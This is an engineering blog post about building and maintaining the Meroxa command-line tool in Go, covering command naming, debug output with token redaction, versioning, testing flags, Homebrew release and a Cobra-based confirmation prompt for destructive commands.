&lt;p&gt;The first thing we considered when making the decision was how other CLIs our customers might already be using were structured. If our CLI users were accustomed to a tool with a specific design, &lt;a href=&quot;https://kubernetes.io/docs/reference/kubectl/&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;kubectl&lt;/code&gt;&lt;/a&gt; for example, which uses “verb noun”, we thought it made sense to go in that direction. The intention was to reduce friction between the two, and let users transition from one tool to another without too much overhead. We started with this approach when we bootstrapped our CLI, and we used this design for a few months.&lt;/p&gt;
&lt;p&gt;Guess what we ended up doing: we changed it to “noun verb”. The reason was that, since there was no community-wide standard for “noun verb” vs. “verb noun”, we could always find other tools that served as a counterargument to our first decision. We had to keep digging into which direction to ultimately take, and our conclusion was that, as humans, we tend to think &lt;strong&gt;first&lt;/strong&gt; about the thing we want to operate on, and only &lt;strong&gt;after&lt;/strong&gt; about what we can do with it. We also considered that the “noun verb” form could be beneficial for discovery purposes. When you run &lt;code class=&quot;language-text&quot;&gt;meroxa help&lt;/code&gt;, the command currently lists the main “things” you can interact with in our platform (apps, resources, etc.). We found that listing actions instead, such as run, list, create, etc., wasn’t that helpful unless you were already familiar with all the features the Meroxa Platform provides.&lt;/p&gt;
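&lt;p&gt;To make the “noun verb” layout concrete, here is a dependency-free sketch of a nested command tree. The real CLI builds this hierarchy with Cobra; the types and command names below are illustrative only:&lt;/p&gt;

```go
package main

import "fmt"

// command is a minimal stand-in for a CLI command tree. The real Meroxa
// CLI is built with Cobra; this sketch only illustrates the “noun verb”
// structure, where nouns are parent commands and verbs are subcommands.
type command struct {
	name string
	run  func() string
	subs map[string]*command
}

// dispatch walks the argument list down the command tree and runs the
// deepest matching command, e.g. ["resources", "list"].
func dispatch(c *command, args []string) string {
	if len(args) > 0 {
		if sub, ok := c.subs[args[0]]; ok {
			return dispatch(sub, args[1:])
		}
	}
	if c.run == nil {
		return "help: " + c.name // bare noun: fall back to help
	}
	return c.run()
}

// newRoot builds meroxa / resources / list (names are illustrative).
func newRoot() *command {
	list := &command{name: "list", run: func() string { return "listing resources" }}
	resources := &command{name: "resources", subs: map[string]*command{"list": list}}
	return &command{name: "meroxa", subs: map[string]*command{"resources": resources}}
}

func main() {
	// “noun verb”: the noun comes first, then the action.
	fmt.Println(dispatch(newRoot(), []string{"resources", "list"}))
}
```

&lt;p&gt;A nice side effect of this layout is the discovery behaviour described above: running the bare noun naturally falls back to listing what you can do with it.&lt;/p&gt;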
&lt;h3&gt;Before Releasing&lt;/h3&gt;
&lt;p&gt;Before you take the step of sharing your CLI with other people, there are questions you should ask yourself. Prioritize accordingly before they become problematic for your development productivity.&lt;/p&gt;
&lt;p&gt;You won’t know in what environments your users will run your CLI, so before going wild and sharing it with the world, spend a bit of time on features that will help you diagnose and fix bugs in released versions. Again, what we’re aiming for here is for you, as a developer, to spend as much time as possible developing new features (or fixing bugs) rather than going back and forth with your customers asking for more information before you can finally fix an issue.&lt;/p&gt;
&lt;p&gt;The most important aspect is that, for every CLI issue your customer finds, you should be able to respond with a specific command that, once executed, gives you some insight into what’s happening.&lt;/p&gt;
&lt;p&gt;Here are some things we prioritized early in the development process:&lt;/p&gt;
&lt;h4&gt;Knowing your version&lt;/h4&gt;
&lt;p&gt;The most important command after &lt;code class=&quot;language-text&quot;&gt;help&lt;/code&gt; is &lt;code class=&quot;language-text&quot;&gt;version&lt;/code&gt;. This command should indicate exactly what CLI version your customers are running. When a customer reports an issue, you need to verify what version they’re on so you can identify whether that issue they’re reporting was already fixed and they only need to upgrade, or if in fact it’s a new issue you need to take care of.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Example:&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;
$ meroxa version
meroxa/2.8.1 darwin/amd64&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Later in the process, we noticed we also needed to be more specific for those advanced users who weren’t running an upstream version of the CLI, but had built the binary locally instead. For that reason, we included a &lt;code class=&quot;language-text&quot;&gt;dev&lt;/code&gt; indication as part of the version, the &lt;code class=&quot;language-text&quot;&gt;git commit sha&lt;/code&gt; they were running, and the closest &lt;code class=&quot;language-text&quot;&gt;git tag&lt;/code&gt; that commit was associated with.&lt;/p&gt;
&lt;p&gt;For those adventurous users who had modified the code locally, &lt;code class=&quot;language-text&quot;&gt;meroxa version&lt;/code&gt; would include &lt;code class=&quot;language-text&quot;&gt;(updated)&lt;/code&gt; to tell us this was the case. Here’s a &lt;a href=&quot;https://docs.meroxa.com/changelog/2022-05-04-meroxa-cli-v-2-0-2&quot;&gt;changelog&lt;/a&gt; we published announcing this change.&lt;/p&gt;
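&lt;p&gt;In Go, this kind of build-time version information is commonly injected with &lt;code class=&quot;language-text&quot;&gt;-ldflags&lt;/code&gt;. Here is a minimal sketch of the pattern; the variable names and output format are illustrative, not necessarily what the Meroxa CLI uses:&lt;/p&gt;

```go
package main

import "fmt"

// These package-level variables are overwritten at release time, e.g.:
//   go build -ldflags "-X main.version=2.8.1 -X main.commit=abc1234"
// Variable names here are illustrative assumptions.
var (
	version = "dev"  // stays "dev" for local, untagged builds
	commit  = "none" // git commit SHA the binary was built from
)

// versionString takes GOOS/GOARCH as parameters to keep the sketch
// deterministic; a real CLI would read runtime.GOOS and runtime.GOARCH.
func versionString(goos, goarch string) string {
	return fmt.Sprintf("meroxa/%s %s/%s (commit: %s)", version, goos, goarch, commit)
}

func main() {
	fmt.Println(versionString("darwin", "amd64"))
}
```

&lt;p&gt;Because the defaults survive when no flags are passed, a locally built binary automatically reports itself as a &lt;code class=&quot;language-text&quot;&gt;dev&lt;/code&gt; build.&lt;/p&gt;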
&lt;h4&gt;Showing API headers and stack trace&lt;/h4&gt;
&lt;p&gt;Another very common issue I often see in other CLIs is their code not dealing with API errors correctly. For example, a customer runs a command and it returns a very generic error message, or no error at all. That’s not very helpful, is it?&lt;/p&gt;
&lt;p&gt;Ideally, you should be able to ask your customer to run the same command they did before, but with some special flag or header instead that could include the entire trace of your command and then give you the exact information you’re looking for.&lt;/p&gt;
&lt;p&gt;This command, in addition to the expected output, should return things such as:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;What API endpoints this command called with its HTTP headers.&lt;/li&gt;
&lt;li&gt;Their actual API responses as they happened including response HTTP headers.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;At Meroxa, we offered two options to accomplish this:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Setting a &lt;code class=&quot;language-text&quot;&gt;MEROXA_DEBUG&lt;/code&gt; environment variable (e.g.: &lt;code class=&quot;language-text&quot;&gt;MEROXA_DEBUG=1 meroxa resources ls&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Providing a &lt;code class=&quot;language-text&quot;&gt;--debug&lt;/code&gt; flag (e.g.: &lt;code class=&quot;language-text&quot;&gt;meroxa resources ls --debug&lt;/code&gt;)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The benefit of using an environment variable is that you could easily set this so it works with &lt;strong&gt;all&lt;/strong&gt; your commands. The second option should be documented via &lt;code class=&quot;language-text&quot;&gt;meroxa help&lt;/code&gt;, and it’s more suitable for one-off attempts when something goes wrong.&lt;/p&gt;
&lt;p&gt;As part of this, you should also bear in mind that users will likely copy the entire stack trace and send it to you. To make this more secure, consider obfuscating your user’s access token: &lt;code class=&quot;language-text&quot;&gt;Authorization: Bearer eyAtIe...FHtiNTA&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Otherwise, these could easily end up in some chat, email, or support tool when in fact these should only belong to your customer.&lt;/p&gt;
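&lt;p&gt;A minimal sketch of both ideas, the debug toggle and the token obfuscation, follows. It is illustrative only: the function names and the exact redaction rule (keep the first six and last seven characters of the token) are assumptions, not the CLI’s actual implementation:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// debugEnabled mirrors the two options above: a --debug flag or the
// MEROXA_DEBUG environment variable (a sketch, not the CLI's actual code).
func debugEnabled(debugFlag bool) bool {
	return debugFlag || os.Getenv("MEROXA_DEBUG") != ""
}

// redactToken keeps only the first 6 and last 7 characters of a bearer
// token so a debug trace can be shared safely. The cut-off points are
// assumptions chosen for illustration.
func redactToken(header string) string {
	const prefix = "Bearer "
	if !strings.HasPrefix(header, prefix) {
		return header // not a bearer token; leave untouched
	}
	token := strings.TrimPrefix(header, prefix)
	if len(token) <= 13 {
		return prefix + "..." // too short to redact meaningfully
	}
	return prefix + token[:6] + "..." + token[len(token)-7:]
}

func main() {
	fmt.Println(redactToken("Bearer eyAtIeXAMPLEONLYTOKENFHtiNTA"))
	// prints: Bearer eyAtIe...FHtiNTA
}
```

&lt;p&gt;Any code path that prints HTTP headers in debug mode can then pass the &lt;code class=&quot;language-text&quot;&gt;Authorization&lt;/code&gt; value through the redaction step first.&lt;/p&gt;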
&lt;h4&gt;Logged in user&lt;/h4&gt;
&lt;p&gt;Different users could have different behaviours, so an easy checkpoint to have around your logged-in users is being able to precisely identify which account they’re using. Something like this is sufficient:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;
$ meroxa &lt;span class=&quot;token function&quot;&gt;whoami&lt;/span&gt;
raul@meroxa.io&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;Automated testing&lt;/h4&gt;
&lt;p&gt;For every pull request we try to merge into the main branch of our CLI repository, we run a sequence of tests to ensure the expected output for a given input.&lt;/p&gt;
&lt;p&gt;In order to make our CLI compatible with automated testing we needed to make scripting possible with things such as:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Providing a &lt;code class=&quot;language-text&quot;&gt;--json&lt;/code&gt; flag&lt;/strong&gt; to all commands, so we could check for specific, deterministic results instead of comparing against string output that could easily change and break our automation scripts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Being able to execute a command with no prompts.&lt;/strong&gt; Some commands expect customers to provide required information before the CLI can carry on with its execution, and we needed to accomplish the same without any user input. Take removing a resource as an example, which usually requires confirmation as it’s a destructive action. At Meroxa, you’d pass &lt;code class=&quot;language-text&quot;&gt;--force&lt;/code&gt; to skip the confirmation prompt, e.g.: &lt;code class=&quot;language-text&quot;&gt;meroxa resources rm my-resource --force&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Being able to use different configuration files.&lt;/strong&gt; This one depends heavily on what kind of CLI you’re developing, but in our case we wanted to make sure our CLI operated correctly in different environments, and an easy way to configure that is with a configuration file. Users can run something such as &lt;code class=&quot;language-text&quot;&gt;meroxa resources ls --config PATH_OF_ANOTHER_CONFIG_FILE&lt;/code&gt;, where the file contains all the configuration needed to point the CLI at another environment.&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;Ready to release&lt;/h4&gt;
&lt;p&gt;Once you have put together a bare-minimum set of features that will make your life as a developer easier, it’s time to release.&lt;/p&gt;
&lt;p&gt;To distribute our CLI, we decided to start using an industry standard such as &lt;a href=&quot;https://brew.sh&quot;&gt;Homebrew&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As I mentioned before, since our CLI was written in Go, using the fantastic tool &lt;a href=&quot;https://goreleaser.com/&quot;&gt;GoReleaser&lt;/a&gt; made perfect sense. It can automatically generate a &lt;a href=&quot;https://goreleaser.com/customization/homebrew/&quot;&gt;Homebrew Tap&lt;/a&gt;, so with every tag created in our CLI repository, a &lt;a href=&quot;https://github.com/meroxa/cli/blob/master/.github/workflows/release.yml&quot;&gt;GitHub Action&lt;/a&gt; publishes a new version of our &lt;a href=&quot;https://github.com/meroxa/homebrew-taps/blob/master/Formula/meroxa.rb&quot;&gt;Homebrew formula&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Maintaining a CLI&lt;/h2&gt;
&lt;p&gt;At this point, we were able to ship a first iteration of our CLI that users could download with a certain degree of confidence. Now I’ll mention the other things we prioritized that weren’t necessarily our main product features.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Collaboration&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Being a sole developer can only get you so far. It was certainly time to invest in making our code ready for contributions. This is especially important if you’re working in the open (source). &lt;a href=&quot;https://opensource.guide/starting-a-project/#launching-your-own-open-source-project&quot;&gt;Here’s some guidance&lt;/a&gt; I’d consider relevant.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Get creative, CLI builder&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;At Meroxa, we decided that while Cobra’s feature set was great to start with, the way commands are composed could be improved to our own benefit.&lt;/p&gt;
&lt;p&gt;To replicate behaviour across certain types of commands, while maintaining the same user experience regardless of each developer’s awareness of these conventions, we needed a way to build commands based on each command’s desired behaviour: something declarative and easily tested.&lt;/p&gt;
&lt;p&gt;For example, on root (&lt;code class=&quot;language-text&quot;&gt;meroxa&lt;/code&gt;), every subcommand is added &lt;a href=&quot;https://github.com/meroxa/cli/blob/master/cmd/meroxa/root/root.go#L84-L103&quot;&gt;like this&lt;/a&gt;, which uses this function to &lt;a href=&quot;https://github.com/meroxa/cli/blob/master/cmd/meroxa/root/root.go#L59&quot;&gt;return a Cobra Command interface&lt;/a&gt; type, based on the methods that it implements.&lt;/p&gt;
&lt;p&gt;For instance, when creating a new command, we would define what methods it needs to implement like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;
&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithDocs             &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithAliases          &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithArgs             &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithClient           &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithLogger           &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithExecute          &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;CommandWithConfirmWithValue &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;These compile-time assertions force the developer to implement every method required by each of the declared interfaces.&lt;/p&gt;
&lt;p&gt;As an example, the following interface is added for every destructive command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;
&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; CommandWithConfirmWithValue &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	Command
	&lt;span class=&quot;token comment&quot;&gt;// ValueToConfirm adds a prompt before the command is executed where the user is asked to write the exact value as&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// wantInput. If the user input matches the command will be executed, otherwise processing will be stopped.&lt;/span&gt;
	&lt;span class=&quot;token function&quot;&gt;ValueToConfirm&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Context&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;wantInput &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;What this gives us is a command that, before executing, prompts you to input a specific value:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;
&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;buildCommandWithConfirmWithValue&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;cmd &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;cobra&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Command&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; c Command&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	v&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ok &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; c&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;CommandWithConfirmWithValue&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;ok &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; force &lt;span class=&quot;token builtin&quot;&gt;bool&lt;/span&gt;

	cmd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Flags&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;BoolVarP&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;force&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;force&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;f&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;skip confirmation&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	old &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; cmd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;RunE
	cmd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;RunE &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;cmd &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;cobra&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Command&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; args &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; old &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;old&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;cmd&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; args&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
				&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
			&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// do not prompt for confirmation when --force is set&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; force &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		wantInput &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;ValueToConfirm&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;cmd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Context&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		reader &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; bufio&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;NewReader&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Stdin&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;To proceed, type %q or re-run this command with --force\n▸ &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; wantInput&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		input&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; reader&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;ReadString&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token char&quot;&gt;&apos;\n&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; wantInput &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; strings&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;TrimSuffix&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;input&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;\n&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;action aborted&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
